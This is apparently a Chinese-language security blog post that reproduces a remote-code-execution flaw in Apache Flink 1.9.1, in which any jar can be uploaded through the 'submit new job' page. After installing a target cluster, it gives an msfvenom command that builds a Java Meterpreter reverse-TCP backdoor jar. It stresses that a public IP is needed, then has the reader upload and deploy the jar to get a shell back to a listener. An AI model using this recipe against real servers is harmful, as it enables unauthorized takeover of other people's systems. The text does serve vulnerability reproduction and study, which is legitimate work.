Apache Flink 任意 Jar 包上传致 RCE漏洞复现

Apache Flink 分布式流数据引擎，具体干什么的这里没兴趣了解。该漏洞由于可上传任意jar包部署导致getshell。漏洞影响至最新版本1.9.1

1.下载安装包

wget https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz

2.解压

tar zxvf flink-1.9.1-bin-scala_2.11.tgz

3.进入bin目录启动

./start-cluster.sh

访问靶机8081端口

漏洞点位于submit new job

首先使用msf生成jar后门

这里有个坑点，这里必须使用公网ip！！

msfvenom -p java/meterpreter/reverse_tcp LHOST=ip LPORT=4000 -f jar > /mnt/d/payload.jar

msf开始监听4000端口

将后门上传至submit new job的上传点

部署

请尊重作者原创，转载复制请标明出处(●'◡'●) 免责声明：该博客中所发表的文章仅用作学习交流使用，任何人不得用来做违法犯罪活动，出现问题均与本人无关。

发表回复 取消回复